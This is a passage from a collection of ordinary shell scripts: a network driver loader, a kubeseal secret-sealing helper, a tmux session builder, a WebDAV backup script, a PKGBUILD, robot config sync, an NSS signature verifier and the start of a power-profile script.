#usage :bash enableAQC111.sh
#==============================================================================
# Fix: the getopts option string was "p:a:" even though the case statement
# handles d), so -d <driver> could never actually be parsed. Added "d:".
while getopts p:a:d: flag
do
case "${flag}" in
a) action=${OPTARG};;
p) path=${OPTARG};;
d) driver=${OPTARG};;
esac
done
# Defaults: package dir = this script's directory, action = "up",
# driver = aqc111.
SYNOPKG_PKGDEST=$path
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
[ -z "$path" ] && SYNOPKG_PKGDEST=$DIR
ACTION=$action
[ -z "$action" ] && ACTION="up"
driver_name=$driver
[ -z "$driver" ] && driver_name="aqc111"
echo "Action: $ACTION";
echo "Path: $SYNOPKG_PKGDEST";
# Unload any already-loaded modules first (aqc111 depends on usbnet and mii).
modArray=( aqc111 usbnet mii )
for i in "${modArray[@]}"
do
echo "detecting.. ".$i.ko
if [ ! -z "$(lsmod | grep $i)" ]
then
echo "removed ".$i.ko
/sbin/rmmod $SYNOPKG_PKGDEST/$i.ko
fi
done
sleep 2;
# Load dependencies first, then the AQC111 driver itself.
/sbin/insmod $SYNOPKG_PKGDEST/mii.ko
/sbin/insmod $SYNOPKG_PKGDEST/usbnet.ko
/sbin/insmod $SYNOPKG_PKGDEST/aqc111.ko
# Check if aqc111 is enable in mod
check_aqc111=`/sbin/lsmod | grep $driver_name`
if [ -z "$check_aqc111" ]
then
exit 0;
else
# NOTE(review): "-z" here is not a valid echo flag and is printed literally;
# plain `echo "$check_aqc111"` was probably intended — left as-is.
echo -z "$check_aqc111";
fi
# For every ethN interface bound to the aqc111 driver: save or restore its
# ifcfg file (depending on ACTION) and bring it up/down with ifconfig.
for interface_name in $(ls /sys/class/net)
do
if [[ ! $interface_name =~ ^eth ]]
then
continue
fi
driver_location=$(ls -ld /sys/class/net/$interface_name/device/driver)
interface_has_aqc111_driver=false
if [ ! -z "$(echo "$driver_location" | grep $driver_name)" ]
then
interface_has_aqc111_driver=true
fi
echo "interface_has_aqc111_driver is "$interface_has_aqc111_driver
if [ $interface_has_aqc111_driver = true ]
then
config_file=/etc/sysconfig/network-scripts/ifcfg-$interface_name
config_storage_location=$SYNOPKG_PKGDEST/ifcfg-$interface_name
# "down": stash the interface config; "up": restore a stashed config.
if [ -f "$config_file" ] && [ "$ACTION" = "down" ]
then
cp $config_file $config_storage_location
elif [ "$ACTION" = "up" ] && [ -f "$config_storage_location" ]
then
cp $config_storage_location $config_file
fi
echo $interface_name" is "$ACTION" by ifconfig"
ifconfig $interface_name $ACTION
fi
done
| true
|
5f9866c1dd0dfebbb6f5a588be9301b84fa35a40
|
Shell
|
nemisphere/k8s-cluster
|
/secrets/secrets.sh
|
UTF-8
| 7,060
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
export REPO_ROOT
REPO_ROOT=$(git rev-parse --show-toplevel)
# Abort with a message if a required binary is not on $PATH.
# Fix: the original called an undefined `die` helper, so a missing binary
# printed "die: command not found" and the script carried on regardless.
# Also uses the portable `command -v` instead of `which`.
need() {
    if ! command -v "$1" >/dev/null 2>&1; then
        echo "Binary '$1' is missing but required" >&2
        exit 1
    fi
}
need "kubeseal"
need "kubectl"
need "sed"
need "envsubst"
if [ "$(uname)" == "Darwin" ]; then
set -a
. "${REPO_ROOT}/secrets/.secrets.env"
set +a
else
. "${REPO_ROOT}/secrets/.secrets.env"
fi
PUB_CERT="${REPO_ROOT}/secrets/pub-cert.pem"
# Helper function to generate secrets
# Reads a plaintext "<name>.txt" template, envsubst's environment values
# into it, wraps the result in a Kubernetes Secret and seals it with
# kubeseal, writing "<name>.yaml" next to the template.
kseal() {
echo "------------------------------------"
# Get the path and basename of the txt file
# e.g. "deployments/default/pihole/pihole-helm-values"
secret="$(dirname "$@")/$(basename -s .txt "$@")"
echo "Secret: ${secret}"
# Get the filename without extension
# e.g. "pihole-helm-values"
secret_name=$(basename "${secret}")
echo "Secret Name: ${secret_name}"
# Extract the Kubernetes namespace from the secret path
# e.g. default
namespace="$(echo "${secret}" | awk -F /cluster/ '{ print $2; }' | awk -F / '{ print $1; }')"
echo "Namespace: ${namespace}"
# Create secret and put it in the applications deployment folder
# e.g. "deployments/default/pihole/pihole-helm-values.yaml"
# NOTE(review): plain --dry-run is deprecated in newer kubectl; switch to
# --dry-run=client when the cluster tooling is upgraded.
envsubst < "$@" | tee values.yaml \
| \
kubectl -n "${namespace}" create secret generic "${secret_name}" \
--from-file=values.yaml --dry-run -o json \
| \
kubeseal --format=yaml --cert="$PUB_CERT" \
> "${secret}.yaml"
# Clean up temp file
rm values.yaml
}
#
# Objects
#
# HASS External
#envsubst < "${REPO_ROOT}/cluster/kube-system/nginx/nginx-external/external_ha.txt" | kubectl apply -f -
#
# Helm Secrets
#
# kseal "${REPO_ROOT}/cluster/default/minio/minio-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/nzbget/nzbget-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/nzbhydra/nzbhydra-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bitwarden/bitwarden-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bazarr/bazarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/dashmachine/dashmachine-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/unifi/unifi-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/ombi/ombi-helm-values.txt"
kseal "${REPO_ROOT}/cluster/default/tautulli/tautulli-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/jackett/jackett-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/radarr/radarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/sonarr/sonarr-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/qbittorrent/qbittorrent-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/plex/plex-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bookstack/bookstack-mariadb-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/bookstack/bookstack-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/default/grocy/grocy-helm-values.txt"
kseal "${REPO_ROOT}/cluster/monitoring/prometheus-operator/prometheus-operator-helm-values.txt"
# kseal "${REPO_ROOT}/cluster/kube-system/keycloak/keycloak-helm-values.txt"
#
# Generic Secrets
#
# Vault Auto Unlock - kube-system namespace
# kubectl create secret generic kms-vault \
# --from-literal=config.hcl="$(envsubst < "$REPO_ROOT"/cluster/kube-system/vault/kms-config.txt)" \
# --namespace kube-system --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/kube-system/vault/vault-kms-config.yaml
# AzureDNS - cert-manager namespace
# Seal the Azure service-principal client secret used by cert-manager's
# AzureDNS solver; the sealed YAML lands in the cluster/cert-manager tree.
kubectl create secret generic azuredns-config \
--from-literal=client-secret="$AZURE_CERTBOT_CLIENT_SECRET" \
--namespace cert-manager --dry-run -o json \
| \
kubeseal --format=yaml --cert="$PUB_CERT" \
> "$REPO_ROOT"/cluster/cert-manager/azuredns/azuredns-config.yaml
# # Restic Password for Stash - default namespace
# kubectl create secret generic restic-backup-credentials \
# --from-literal=RESTIC_PASSWORD=$RESTIC_PASSWORD \
# --from-literal=AWS_ACCESS_KEY_ID=$MINIO_ACCESS_KEY \
# --from-literal=AWS_SECRET_ACCESS_KEY=$MINIO_SECRET_KEY \
# --namespace default --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/stash/stash/restic-backup-credentials.yaml
# # Keycloak Realm - kube-system namespace
# kubectl create secret generic keycloak-realm \
# --from-literal=realm.json="$(envsubst < "$REPO_ROOT"/cluster/kube-system/keycloak/keycloak-realm.txt)" \
# --namespace kube-system --dry-run -o json \
# | \
# kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/cluster/kube-system/keycloak/keycloak-realm.yaml
# NginX Basic Auth - default namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
# --namespace default --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-default.yaml
# NginX Basic Auth - kube-system namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
# --namespace kube-system --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-kube-system.yaml
# NginX Basic Auth - monitoring namespace
#kubectl create secret generic nginx-basic-auth \
# --from-literal=auth="$NGINX_BASIC_AUTH" \
# --namespace monitoring --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/kube-system/nginx-ingress/basic-auth-monitoring.yaml
# Cloudflare API Key - cert-manager namespace
#kubectl create secret generic cloudflare-api-key \
# --from-literal=api-key="$CF_API_KEY" \
# --namespace cert-manager --dry-run -o json \
# | \
#kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/cert-manager/cloudflare/cloudflare-api-key.yaml
# qBittorrent Prune - default namespace
#kubectl create secret generic qbittorrent-prune \
# --from-literal=username="$QB_USERNAME" \
# --from-literal=password="$QB_PASSWORD" \
# --namespace default --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/default/qbittorrent-prune/qbittorrent-prune-values.yaml
# sonarr episode prune - default namespace
#kubectl create secret generic sonarr-episode-prune \
# --from-literal=api-key="$SONARR_APIKEY" \
# --namespace default --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/default/sonarr-episode-prune/sonarr-episode-prune-values.yaml
# sonarr exporter
#kubectl create secret generic sonarr-exporter \
# --from-literal=api-key="$SONARR_APIKEY" \
# --namespace monitoring --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/monitoring/sonarr-exporter/sonarr-exporter-values.yaml
# radarr exporter
#kubectl create secret generic radarr-exporter \
# --from-literal=api-key="$RADARR_APIKEY" \
# --namespace monitoring --dry-run -o json \
# | kubeseal --format=yaml --cert="$PUB_CERT" \
# > "$REPO_ROOT"/deployments/monitoring/radarr-exporter/radarr-exporter-values.yaml
| true
|
fa5ac7a1de2082228a2b30dbd8cd031b9fe0364a
|
Shell
|
DorianListens/dotfiles
|
/tmuxwork.sh
|
UTF-8
| 1,256
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
# Create (if needed) and attach to a tmux workspace for the "infoactive"
# project: an editor window with test runner and git panes, plus a window
# of server processes.
SESSION="infoactive"
# NOTE(review): the tilde is inside quotes, so THIS shell never expands it;
# the literal text "cd ~/infoactive" is replayed by send-keys and the shell
# inside each pane expands it there.
DIR="~/infoactive"
# Build the whole workspace in a detached session: window 1 holds the
# editor (vi) over a karma test runner and a git status pane; window 2
# holds rails server, delayed-job worker and guard side by side.
# The tmux commands are order-dependent (each split/select targets the
# currently active pane), so do not reorder them.
create_session() {
tmux -2 new-session -d -s "$SESSION"
# Editor Window
tmux send-keys "cd " $DIR C-m
tmux send-keys "vi" C-m
tmux split-window -v
tmux resize-pane -D 15
tmux send-keys "cd " $DIR C-m
tmux send-keys "ulimit -n 350" C-m
tmux send-keys "karma start" C-m
tmux split-window -h
tmux send-keys "cd " $DIR C-m
tmux send-keys "git fetch && git status" C-m
# Server stuff window
tmux new-window -t $SESSION:2 -n 'Server Processes'
tmux split-window -h
tmux split-window -h
tmux select-layout even-horizontal
tmux select-pane -t 1
tmux send-keys "cd " $DIR C-m
tmux send-keys "foreman run rails s" C-m
tmux select-pane -t 2
tmux send-keys "cd " $DIR C-m
tmux send-keys "rake jobs:work" C-m
tmux select-pane -t 3
tmux send-keys "cd " $DIR C-m
tmux send-keys "guard" C-m
tmux select-pane -t 1
tmux select-window -t $SESSION:1
tmux select-pane -t 1
}
# True when a tmux session named exactly $SESSION already exists.
session_exists() {
  tmux list-sessions | cut -d: -f1 | grep -qx "$SESSION"
}
# Attach this terminal to the workspace session (-2 forces 256 colors).
attach_to_session() {
tmux -2 attach-session -t $SESSION
}
# Entry point: make sure the workspace exists, then attach to it.
create_if_needed_and_attach() {
  session_exists || create_session
  attach_to_session
}

create_if_needed_and_attach
| true
|
283b8a37232b8c5ceef63a7b2797e15adce6ae94
|
Shell
|
rokiden/WebBackup
|
/webbackup.sh
|
UTF-8
| 1,104
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# webbackup.sh — tar+gzip a directory and upload the archive to a WebDAV
# server, skipping the work entirely when nothing changed since the last run.
#
# Usage: webbackup.sh dir_path webdav user [backup_name]
#   dir_path     directory to back up
#   webdav       WebDAV base URL to upload into
#   user         WebDAV username (curl prompts for / resolves the password)
#   backup_name  optional archive name prefix (default: basename of dir_path)
#
# A timestamp file under /var/tmp marks the last successful run; a new
# archive is made only when some file in dir_path is newer than that mark.
# Fix over the original: every expansion is quoted, so paths and names
# containing spaces no longer break word-splitting; '$?' checks replaced
# with direct 'if' tests.

if [[ $# -ne 3 ]] && [[ $# -ne 4 ]]; then
  echo "Usage: $(basename "$0") dir_path webdav user [backup_name]"
  exit 0
fi

backup_dir=$1
webdav=$2
user=$3

# optional fourth argument overrides the archive name prefix
if [ -n "$4" ]; then
  backup_name=$4
else
  backup_name=$(basename "$backup_dir")
fi

backup_path="/var/tmp/${backup_name}_$(date +%Y%m%d-%H%M%S).tar.gz"
backup_ts="/var/tmp/${backup_name}_ts"
curl_url="$webdav/$(basename "$backup_path")"

if [ -f "$backup_ts" ]; then
  echo "Timestamp file found, find newer..."
  # any file newer than the timestamp file means a fresh backup is needed
  if [[ -n $(find "$backup_dir" -type f -newer "$backup_ts") ]]; then
    new_found=true
  else
    new_found=false
  fi
else
  echo "Timestamp file not found"
  new_found=true
fi

if $new_found; then
  echo "Backuping..."
  echo "$backup_path"
  if tar -cvzf "$backup_path" "$backup_dir"; then
    echo "Uploading..."
    curl --fail -T "$backup_path" -u "$user:" -H 'X-Requested-With: XMLHttpRequest' "$curl_url" && echo "Curl ok" || echo "Curl error"
    # record the time of this backup for the next run's -newer test
    if ! touch "$backup_ts"; then
      echo "Can't touch ts" >&2
    fi
  else
    echo "tar error" >&2
  fi
  echo "Cleanup..."
  rm "$backup_path"
else
  echo "Backup skipped"
fi
| true
|
d7508a05867f61783263ff5d7947ae0d5281e893
|
Shell
|
ilventu/aur-mirror
|
/libretro-mednafen-pce-git/PKGBUILD
|
UTF-8
| 798
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: almostalive <almostalive2003 at gmail dot com>
# PKGBUILD for the libretro mednafen PC Engine core, built from git HEAD.
pkgname=libretro-mednafen-pce-git
pkgver=20120910
pkgrel=1
pkgdesc="libretro implementation of mednafen's PC Engine."
arch=('i686' 'x86_64')
url="https://github.com/libretro/mednafen-pce-libretro"
license=('custom')
makedepends=('git')
conflicts=('libretro-super-git')
# upstream repository cloned/updated by build()
_gitroot="git://github.com/libretro/mednafen-pce-libretro.git"
_gitname="mednafen-pce-libretro"
# Clone the upstream repo into $srcdir (or update an existing checkout),
# then compile with make. Old-style VCS PKGBUILD; the '|| return 1' guards
# are the pre-set-e error-handling convention of that era.
build()
{
cd $srcdir
msg "Cloning mednafen-pce-libretro from GIT"
if [ -d $_gitname ]; then
cd $_gitname
git pull || return 1
else
git clone $_gitroot $_gitname || return 1
cd $_gitname
fi
make
}
# Install the built core into the libretro plugin directory under $pkgdir.
# Fix: quote $srcdir/$pkgdir — makepkg build paths may contain spaces and
# the unquoted expansions would word-split.
package()
{
mkdir -p "$pkgdir/usr/lib/libretro"
install -v -m644 "$srcdir/$_gitname/libretro.so" "$pkgdir/usr/lib/libretro/libretro-mednafen-pce.so"
}
| true
|
3536f2d162a3464e0eb15665c803276b41230613
|
Shell
|
team5499/frc-2017-offseason
|
/updateVars.sh
|
UTF-8
| 315
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# Push or pull the robot variable file to/from the roboRIO over its mDNS name.
#
# Usage: updateVars.sh push|pull path/to/vars.json
#   push: copy the local file onto the RIO, then sync so it survives a
#         power cycle (the RIO's flash is write-buffered).
#   any other first argument: pull the RIO's copy down to the local path.
#
# Fix: quote ${vars_directory} so local paths with spaces work.
vars_directory=$2
team_number=5499

if [ "${1}" == "push" ]; then
  scp "${vars_directory}" "admin@roborio-${team_number}-frc.local:/home/lvuser/vars.json"
  # flush filesystem buffers on the RIO immediately after the copy
  ssh "admin@roborio-${team_number}-frc.local" "sync"
else
  scp "admin@roborio-${team_number}-frc.local:/home/lvuser/vars.json" "${vars_directory}"
fi
| true
|
96afe17e7c364d8dc4aeb3758265590394282e7b
|
Shell
|
bigklopp/Shell_git
|
/istring.sh
|
UTF-8
| 136
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Ask the user for confirmation (y/n) and report whether we proceed.
read -p "실행할까요? (y/n)" CHOICE
case $CHOICE in
  # any answer beginning with y or Y counts as yes
  [yY]*) echo "실행됨" ;;
  *) echo "실행 취소됨" ;;
esac
| true
|
67098f4d92158d3778b55f5dedf0b2708f65dc2c
|
Shell
|
p16i/segmentation-speed-benchmark
|
/scripts/run-experiments.sh
|
UTF-8
| 331
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Run every benchmark method $TOTAL times on each dataset given as an
# argument, timing each run and saving its output to .result-<ds>-<m>-<i>.
#
# Required environment:
#   TOTAL  — number of runs per (dataset, method) pair
#   METHOD — whitespace-separated list of script names under ./scripts/
#
# Fixes: $(...) instead of deprecated backticks for seq; quoted "$d",
# "$RUNS" and the result filename so dataset paths with spaces work.
RUNS=$TOTAL
METHODS="$METHOD"

# start from a clean slate
rm -rf .result*

for d in "$@"
do
  # intentional word-splitting: METHODS is a whitespace-separated list
  for m in $METHODS
  do
    for i in $(seq 1 "$RUNS")
    do
      slug="$d-$m-$i"
      echo "Running $slug"
      time python3 "./scripts/$m" "$d" > ".result-$slug"
      # brief cooldown between runs to reduce thermal/caching interference
      echo "sleep" && sleep 2
    done
  done
done
| true
|
71a72a1c2b9e2e03306a34fc461b54f13bc35078
|
Shell
|
Thallsrrt/Projeto-Thales
|
/MENU G. DE DISPOSITIVO.sh
|
UTF-8
| 1,930
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
# Dialog-driven device management menu (Portuguese UI). Navigation works by
# mutual recursion between the menu functions rather than by loops.
TMP=0
# Top-level menu: open the device manager or quit. dialog exit code 255
# means ESC/cancel.
MENU(){
OPCAO=$(dialog \
--stdout \
--title 'Menu' \
--menu 'Escolha uma opção' \
0 0 0 \
1 'Gerenciado de dispositivo' \
2 'Sair')
case $OPCAO in
1) GREP ;;
2) FIM ;;
255) exit ;;
*) exit 0 ;;
esac
}
# Confirm before leaving the script; on "no" return to the main menu.
FIM(){
dialog \
--title 'FLW' \
--yesno 'Deseja mesmo sair?' \
0 0
if (( $? == '0' )); then
exit 0
else
MENU
fi
}
# Device management sub-menu: each entry jumps to one diagnostic helper
# below, option 9 returns to the main menu.
# (The uppercase name does not shadow the external 'grep' command.)
GREP(){
OPCAO=$(dialog \
--stdout \
--title 'Gerenciar Dispositivo' \
--menu 'Escolha uma opção' \
0 0 0 \
1 'Configurar Teclado' \
2 'Informações da Bateria' \
3 'Informações da CPU' \
4 'Informações da Memória' \
5 'Versão do S.O' \
6 'Versão do kernel' \
7 'Informação da Placa de Vídeo' \
8 'Quanto tempo o PC está ligado' \
9 'Voltar')
case $OPCAO in
1) CTEC ;;
2) IBAT ;;
3) ICPU ;;
4) IMEM ;;
5) VDSO ;;
6) VKER ;;
7) IPVI ;;
8) TPCL ;;
9) MENU ;;
255) exit 0 ;;
*) exit 0 ;;
esac
}
# Switch the console keyboard layout from 'us' to 'br' by rewriting
# /etc/default/keyboard (needs root), then offer a reboot.
CTEC(){
dialog --yesno 'Aperte YES para configurar o teclado' 0 0
if (( $? == "0" )); then
sed 's/us/br/g' /etc/default/keyboard > /etc/default/keyboard.tmp && mv /etc/default/keyboard.tmp /etc/default/keyboard
else
GREP
fi
# NOTE(review): this $? tests the preceding if/else compound, not the
# sed|mv result directly, so it is almost always 0 — confirm the intent.
if (( $? == '0' )); then
dialog --yesno 'Deseja reiniciar a máquina?' 0 0
if (( $? == '0' )); then
init 6
else
GREP
fi
fi
GREP
}
# The eight helpers below share one shape: clear the screen, run a single
# diagnostic command, wait for Enter, then go back to the device menu.

# Battery details
IBAT(){
clear
acpi -V
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# CPU details
ICPU(){
clear
lscpu
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# Memory usage
IMEM(){
clear
free -h
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# OS release
VDSO(){
clear
lsb_release -a
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# Kernel version
VKER(){
clear
uname -r
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# Graphics card (VGA PCI device)
IPVI(){
clear
lspci | grep -i vga
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# Uptime
TPCL(){
clear
uptime
echo 'Digite [enter] para voltar'
read xxx
GREP
}
# TMP is never modified, so this loops forever; the script only exits via
# the explicit 'exit' calls inside the dialog handlers above.
while (( $TMP == '0' )); do
MENU
done
| true
|
760cbd896636025313feb2bd7f53316e0d29912f
|
Shell
|
pktn/dotfiles
|
/.zshrc
|
UTF-8
| 3,323
| 2.890625
| 3
|
[] |
no_license
|
# Character encoding
export LANG=ja_JP.UTF-8
# PATH setup
PATH=/usr/local/bin:$PATH
export MANPATH=/usr/local/share/man:/usr/local/man:/usr/share/man
export SVN_EDITOR=vim
# Functions: recursive grep over regular files, skipping binaries
find-grep () { find . -type f -print | xargs grep -n --binary-files=without-match $@ }
# Aliases
alias ls='ls --color=auto'
alias ll='ls -ltr'
alias gd='dirs -v; echo -n "select number: "; read newdir; cd +"$newdir"'
alias vi='vim'
alias grep='grep --color=auto'
# Prompt
# PROMPT='%~# '
local GREEN=$'%{\e[1;31m%}'
local YELLOW=$'%{\e[1;33m%}'
local BLUE=$'%{\e[1;34m%}'
local DEFAULT=$'%{\e[1;m%}'
PROMPT=$BLUE'%~ '$DEFAULT'%(!.#.$) '
# History
HISTFILE=~/.histfile
HISTSIZE=10000
SAVEHIST=10000
# Record timestamps in the history file
setopt extended_history
# Only ask before listing completions when they would overflow the screen
LISTMAX=0
autoload -Uz compinit; compinit
# Complete commands after sudo as well
zstyle ':completion:*:sudo:*' command-path /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin
# Automatically pushd on every cd
setopt auto_pushd
# Append to the history file instead of overwriting it (safe when several
# zsh sessions run at once)
setopt append_history
# List choices when there are multiple completion candidates
setopt auto_list
# Pack the completion list as tightly as possible
setopt list_packed
# Cycle through candidates by repeatedly pressing the completion key (Tab, Ctrl+I)
# setopt auto_menu
# Automatically complete matching brackets and the like
setopt auto_param_keys
# Append a trailing / when completing a directory name, ready for the next completion
setopt auto_param_slash
# Disable the beep
setopt no_beep
# Don't add a command line to history when it duplicates the previous entry
setopt hist_ignore_dups
# Don't record the history command itself
setopt hist_no_store
# Strip superfluous whitespace before recording to history
setopt hist_reduce_blanks
# (disabled) Don't record command lines that start with a space
# setopt hist_ignore_spece
# (disabled) Never add duplicate history entries
# setopt hist_ignore_all_dups
# Allow editing a recalled history line before executing it
setopt hist_verify
# Don't mark file types (like ls -F) in auto_list completion listings
setopt no_list_types
# Allow completion after '=' in arguments such as --prefix=/usr
setopt magic_equal_subst
# Append a trailing / when filename expansion matches a directory
setopt mark_dirs
# Pass 8-bit characters through so Japanese filenames display correctly
setopt print_eight_bit
# Share history across shell processes
setopt share_history
# Make Ctrl+W delete back only to the previous '/'
WORDCHARS='*?_-.[]~=&;!#$%^(){}<>'
# Colorize file-list completion the same way ls does
zstyle ':completion:*' list-colors ${(s.:.)LS_COLORS}
# Run ls after every cd
function chpwd() { ls }
# Change directory by typing a bare directory name
setopt auto_cd
# Disable C-s / C-q terminal flow control
setopt no_flow_control
[ -f ~/.zshrc.local ] && source ~/.zshrc.local
| true
|
706298b8701dda13c971cf5571ca806dd1c3cde7
|
Shell
|
kskovpen/bTag
|
/SimAnalysis/SimAnalysis/test/SimPlot/test/getListRF.zsh
|
UTF-8
| 1,553
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/env zsh
# Build per-sample file lists for batch jobs by walking a DPM storage tree
# with rfdir (4 directory levels deep) and rewriting each path to its
# xrootd URL. Lists are chunked into nFilesMC files apiece under lists/.
# zsh semantics: $array expands to all elements, unlike bash.
fpathMC="/dpm/in2p3.fr/home/cms/phedex/store/user/kskovpen/SimAnalysis/v20160409/"
liMC=($(/usr/bin/rfdir ${fpathMC} | awk '{print $9}'))
# same tree reachable through the xrootd door
fpathMCXRD=$(echo ${fpathMC} | sed "s%/dpm%root://sbgse1.in2p3.fr//dpm%g")
# files per output list chunk
nFilesMC=20
outDir="lists/"
rm -rf ${outDir}
mkdir ${outDir}
rm -f /tmp/tempMC.txt
for line in $liMC
do
echo $line
d1=$(echo $line)
liMC2=$(/usr/bin/rfdir ${fpathMC}${d1} | awk '{print $9}')
d2=($(echo $liMC2))
for id2 in $d2
do
liMC3=$(/usr/bin/rfdir ${fpathMC}${d1}/${id2})
d3=$(echo $liMC3 | awk '{print $9}')
liMC4=($(/usr/bin/rfdir ${fpathMC}${d1}/${id2}/${d3} | awk '{print $9}'))
for d4 in $liMC4
do
liMC5=($(/usr/bin/rfdir ${fpathMC}${d1}/${id2}/${d3}/${d4} | awk '{print $9}'))
for line2 in $liMC5
do
f1=$(echo $line2)
file=$(echo ${fpathMCXRD}${d1}/${id2}/${d3}/${d4}/${f1})
echo "${file}" >> /tmp/tempMC.txt
done
done
# split the accumulated URL list into numbered chunks of nFilesMC lines
split -a 5 -l ${nFilesMC} -d /tmp/tempMC.txt /tmp/${d1}_
lsfi=($(ls /tmp/${d1}_*))
jid=0
for fil in $lsfi
do
# strip the campaign suffix from the dataset name for the output filename
sampStrip=$(echo $id2 | sed "s%_RunIISpring15MiniAODv2_.*%%g")
if [[ $#d2 != 1 && ${d1} != "tHFCNC13TeV" ]]; then
mv ${fil} ${outDir}${d1}_${sampStrip}_ID${jid}.txt
else
if [[ ${d1} == "tHFCNC13TeV" ]]; then
mv ${fil} ${outDir}${d1}"_"$(echo ${id2} | sed "s%_AODFASTSIM_.*%%g")_ID${jid}.txt
else
mv ${fil} ${outDir}${d1}_ID${jid}.txt
fi
fi
jid=$[$jid+1]
done
rm -f /tmp/tempMC.txt
done
done
| true
|
e3baeb9256a2a5a40387ae32b29f4d4383a0ef98
|
Shell
|
gdestuynder/ffos_packaged_app_signature_utils
|
/verify.sh
|
UTF-8
| 1,215
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****

# Verifies a packaged app (zip) signature against a supplied certificate
# using the NSS tools (certutil/cmsutil) in a throwaway NSS database.
# Exit status: 0 when the signature verifies, 1 otherwise.
# Fixes over the original: temp directories were leaked on every early
# 'exit 1' path — cleanup now runs from an EXIT trap; expansions quoted.
# kang@mozilla.com

[[ $# -eq 2 ]] || {
  echo "USAGE: $0 <signed.zip> <certificate.crt>"
  exit 1
}

zip=$1
crt=$2

tmp_zip=$(mktemp -d)
tmp=$(mktemp -d)

# remove the scratch NSS database and unpacked zip on ANY exit path
cleanup() { rm -rf -- "$tmp" "$tmp_zip"; }
trap cleanup EXIT

# deliberately unquoted below: these hold a command plus its -d argument
certutil="certutil -d $tmp"
cmsutil="cmsutil -d $tmp"
cwd=$(pwd)
ex=0

cp "$zip" "$tmp_zip/"
cp "$crt" "$tmp_zip/"
cd "$tmp_zip" && unzip "$(basename "$zip")" || {
  echo "Couldn't unzip $tmp_zip/$zip"
  exit 1
}

[[ -d META-INF ]] || {
  echo "Couldn't find directory $tmp_zip/META-INF"
  exit 1
}

echo
echo "Just hit enter twice as password, this database is deleted at the end of the script run."
echo

# create the scratch DB, import the cert as a trusted CA, then verify the
# CMS signature over the manifest
$certutil -N
$certutil -A -n root-cert -t ",,C" -i "$(basename "$crt")"
$cmsutil -D -i META-INF/zigbert.rsa -c META-INF/zigbert.sf -u 6 && {
  echo
  echo ":) SIGNATURE CHECK SUCCESS: Congratulations, signature has been verified for the supplied certificate"
} || {
  echo
  echo ":( FAILED: Invalid signature"
  ex=1
}

cd "$cwd"
exit $ex
| true
|
9304bdedb575c316129699805aff17a2bec8933c
|
Shell
|
supplantr/ftw
|
/ftw
|
UTF-8
| 5,003
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# ftw — apply a named power profile (adp = AC adapter, bat = battery) by
# writing kernel/sysfs tunables. _defaults supplies built-in profiles when
# /etc/conf.d/ftw is absent.

# Define the built-in profiles. Each profile function only sets variables;
# _common performs the actual sysfs/proc writes.
# Fix: the original iterated 'for i in $MODULES', which in bash expands to
# only the FIRST array element (uvcvideo) — videodev was never touched.
# "${MODULES[@]}" iterates all of them.
_defaults() {
PROFILE_FILE=/tmp/ftw.profile
MODULES=(uvcvideo videodev)
# AC adapter profile: performance-leaning settings, load webcam modules.
adp() {
CPUFREQ_GOVERNOR=ondemand
NMI_WATCHDOG=1
BUS_CONTROL=on
